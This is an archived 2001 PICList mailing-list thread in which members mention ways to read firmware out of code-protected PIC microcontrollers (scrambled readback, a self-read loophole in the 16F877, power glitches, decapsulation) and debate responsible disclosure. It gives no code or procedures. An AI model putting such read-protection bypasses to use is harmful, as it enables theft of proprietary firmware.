Searching \ for '[PIC]: Read this for your own good' in subject line. ()
Make payments with PayPal - it's fast, free and secure! Help us get a faster server
FAQ page: www.piclist.com/techref/microchip/devices.htm?key=pic
Search entire site for: 'Read this for your own good'.

Exact match. Not showing close matches.
PICList Thread
'[PIC]: Read this for your own good'
2001\11\03@054912 by Peter L. Peres

picon face
I just stumbled across a method to read out PIC code in any PIC that uses
the XNOR/XOR scrambled readback method when the PIC is protected. It is
here:

http://www.net.yu/~dejan/

I know that more recent PICs read out as zeros when protected. I hope that
you out there who rely on PIC data protection know this.

Peter

PS: Apologies if you already know this.

--
http://www.piclist.com hint: PICList Posts must start with ONE topic:
[PIC]:,[SX]:,[AVR]: ->uP ONLY! [EE]:,[OT]: ->Other [BUY]:,[AD]: ->Ads


2001\11\03@060409 by James Caska

picon face
Is nothing safe!

..We all know how to to hack protected F877's right?

James Caska
spam_OUTcaskaTakeThisOuTspamvirtualbreadboard.com


{Original Message removed}

2001\11\04@033029 by Philip Pemberton

picon face
James Caska said:
> Is nothing safe!
>
> ..We all know how to to hack protected F877's right?
I don't - what's the secret? A diode? A clock glitch? A Vcc glitch?

Later.
--
Phil.
.....philpemKILLspamspam@spam@bigfoot.com
http://www.philpem.f9.co.uk/

--
http://www.piclist.com hint: The list server can filter out subtopics
(like ads or off topics) for you. See http://www.piclist.com/#topics


2001\11\04@035016 by James Caska

picon face
Philip Pemberton wrote,

>I don't - what's the secret? A diode? A clock glitch? A Vcc glitch?

I don't actually believe in hacking, I was just curious to see if the 877
hack is public knowledge. I don't know if making public a hack is a good
idea or not? Thoughts..?

Regards,
James Caska
caskaspamKILLspamvirtualbreadboard.com http://www.virtualbreadboard.com
ujVM - 'The worlds smallest java virtual machine'

{Original Message removed}

2001\11\04@054320 by Gerhard Fiedler
flavicon
face
At 19:51 11/04/2001 +1100, James Caska wrote:
>I don't actually believe in hacking, I was just curious to see if the 877
>hack is public knowledge. I don't know if making public a hack is a good
>idea or not? Thoughts..?

I'm not sure, but I would tend to say that publishing it is the better of
the two. Then people can make a better informed choice on whether to rely
on the protection or not, or when and how to rely on it, or what to do to
prevent the hack. And the manufacturer has a better chance to fix it.

Of course, if you want to exploit the hack, you better don't publish it...
After all, it's one of your business assets  :)

ge

--
http://www.piclist.com hint: The list server can filter out subtopics
(like ads or off topics) for you. See http://www.piclist.com/#topics


2001\11\04@061218 by James Caska

picon face
Gerhard Fiedler wrote;
>I'm not sure, but I would tend to say that publishing it is the better of
>the two. Then people can make a better informed choice on whether to rely
>on the protection or not, or when and how to rely on it, or what to do to
>prevent the hack. And the manufacturer has a better chance to fix it.

I tend to agree that public knowledge (as with encyption algorithms) is
best. In truth it is not a "pure hack" more a special condition loophole in
the segmented protection whereby if the device is not fully protected the
877's ability to read its own memory can be used to export the whole of the
memory. Segmenting is better handled by the PIC18FXX2. I came across it when
considering how to protect the ujVM877 when it downloads new class files
(native compiled) and had to abandon having firmware onchip because of the
loophole.

Whats a ujVM877? Well thats another story that is going to take a while to
tell, but essentially ever wondered if a PIC could exectute PURE java ie
java compiled by javac.. the answer is yes.

Regards,
James Caska
.....caskaKILLspamspam.....virtualbreadboard.com http://www.virtualbreadboard.com
ujVM - 'The worlds smallest java virtual machine'


{Original Message removed}

2001\11\04@141546 by Spehro Pefhany

picon face
At 10:13 PM 11/4/01 +1100, you wrote:
>
>I tend to agree that public knowledge (as with encyption algorithms) is
>best. In truth it is not a "pure hack" more a special condition loophole in
>the segmented protection whereby if the device is not fully protected the
>877's ability to read its own memory can be used to export the whole of the
>memory. Segmenting is better handled by the PIC18FXX2. I came across it when
>considering how to protect the ujVM877 when it downloads new class files
>(native compiled) and had to abandon having firmware onchip because of the
>loophole.

I understand the PIC "F" series, though better than previous attempts, still
have some vulnerability to Vdd glitch attacks as well as simple invasive
attack
(decapsulation and microprobing).

My thought is that you tell Microchip first, wait "n" months where 2< n < 6
and
then tell the public, and tell whatever individuals you like in the meantime.

Best regards,

Spehro Pefhany --"it's the network..."            "The Journey is the reward"
EraseMEspeffspam_OUTspamTakeThisOuTinterlog.com             Info for manufacturers: http://www.trexon.com
Embedded software/hardware/analog  Info for designers:  http://www.speff.com
     /.-.\
    (( * ))
     \\ //     Please help if you can:
      \\\      dailynews.yahoo.com/fc/US/Emergency_Information/
     //\\\
    /// \\\
    \/   \/

--
http://www.piclist.com hint: The list server can filter out subtopics
(like ads or off topics) for you. See http://www.piclist.com/#topics


2001\11\05@164906 by Peter L. Peres

picon face
> to tell or not to tell

I aggree with Sphero but I believe that I was right to let it go, because
it seems to be old news, and because it popped up in a web search for
something else related to pics. Makes you really wonder how many times it
popped up for others, and they did not tell, doesn't it ?

I remember that we used to be able to protect EPROMs permanently by
blasting the Vpp pad contact with a 1A reverse current (vs. gnd) in 2708
and 2716 EPROM clones. This was necessary because someone was in the
business of making them disappear and reappear on the black market (this
was not in this country).

Maybe the PIC could have a weak internal pullup on MCLR (like the 12C5xx
have for sure) and an extra beefy MCLR reverse diode to GND so the pad
wire could be burned permanently with a reverse current pulse. Then maybe
this is extreme ;-).

Peter

--
http://www.piclist.com hint: The PICList is archived three different
ways.  See http://www.piclist.com/#archives for details.


2001\11\06@202444 by Jinx

face picon face
> I just stumbled across a method to read out PIC code in any PIC
> that uses the XNOR/XOR scrambled readback method when the
> PIC is protected. It is here:
>
> http://www.net.yu/~dejan/

And I stumbled across this one today. Common PICs are in the list
of those broken into using power glitches

http://www.cl.cam.ac.uk/~sps32/mcu_lock.html

--
http://www.piclist.com#nomail Going offline? Don't AutoReply us!
email listservspamspam_OUTmitvma.mit.edu with SET PICList DIGEST in the body


More... (looser matching)
- Last day of these posts
- In 2001 , 2002 only
- Today
- New search...